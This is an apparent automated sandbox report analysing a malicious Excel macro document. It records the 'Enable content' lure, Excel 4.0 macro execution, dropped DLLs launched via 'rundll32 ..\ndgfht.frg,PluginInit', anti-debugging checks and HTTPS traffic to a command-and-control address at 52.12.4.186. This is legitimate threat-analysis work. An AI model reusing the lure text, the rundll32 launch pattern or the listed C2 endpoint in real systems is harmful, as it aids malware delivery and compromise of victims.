      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
      Source: rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: rundll32.exe, 00000004.00000003.2166659967.00000000002DA000.00000004.00000001.sdmpString found in binary or memory: https://52.12.4.186/5B
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/h
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update6
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateA
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateF
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownHTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
      Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmpBinary or memory string: DirectDrawCreateEx
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: GetRawInputData
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1108, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
      Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start . the decryption of the docum
      Source: Screenshot number: 8Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
      Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
      Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
      Source: Document image extraction number: 3Screenshot OCR: Enable Content
      Source: Document image extraction number: 4Screenshot OCR: Enable Editing
      Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
      Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
      Source: Screenshot number: 12Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Documents_460000622_1464906353.xlsInitial sample: EXEC
      Source: Documents_460000622_1464906353.xlsInitial sample: CALL
      Office process drops PE fileShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E777A4B NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E783C31
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7A9E50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5FFD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F3FDF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F0C10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5DC3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7A8A70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5B94
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E595A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D665D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F0760
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79A730
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E572B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E6723
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E64C6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7ED5DE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E625A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79C2D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7FB360
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D83F0
      Source: Documents_460000622_1464906353.xlsOLE indicator, VBA macros: true
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7794D0 appears 34 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7D4553 appears 73 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7D4E40 appears 54 times
      Source: Documents_460000622_1464906353.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@1/2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E777B4D CoCreateInstance,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{ce7c126a-cd42-45d2-8a55-1f743478800b}
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{395c2195-6d12-42eb-b952-6aae2e230819}
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7B8.tmpJump to behavior
      Source: Documents_460000622_1464906353.xlsOLE indicator, Workbook stream: true
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
      Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
      Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E784371 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E792E8F push ss; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4E86 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7926ED push esp; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D451C push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79521B push esp; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E791047 push esp; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E794020 push cs; ret
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmpBinary or memory string: CDB.EXEWINDBG.EXE
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F61E FindFirstFileExW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802EC8 FindFirstFileExA,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803336 FindFirstFileExA,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803361 FindFirstFileExW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F248 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77C61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F4D21 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77865C GetProcessHeap,InternetQueryDataAvailable,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E778FBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7791BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4A3C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E9302 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.12.4.186 187
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: Yara matchFile source: Documents_460000622_1464906353.xls, type: SAMPLE
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: FoldersAppPropertiesPROGMAN
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: GetProgmanWindow
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: ProgmanProgman3
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: IMECreateGroupShowGroupAddItemExitProgmanDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileDDEClientddeClassccInsDDEBWWFrameDDEClientWndClassBACKSCAPE#32770SenderCA_DDECLASSInstallMake Program Manager GroupViewFolderExploreFolder
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: SetProgmanWindow
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7792E1 cpuid
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E779516 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802845 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting11Path InterceptionProcess Injection112Masquerading121Input Capture21System Time Discovery2Remote ServicesInput Capture21Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerSecurity Software Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll0%ReversingLabs
      C:\Users\user\ndgfht.frg0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://www.a-cert.at0E0%URL Reputationsafe
      http://www.a-cert.at0E0%URL Reputationsafe
      http://www.a-cert.at0E0%URL Reputationsafe
      http://www.a-cert.at0E0%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
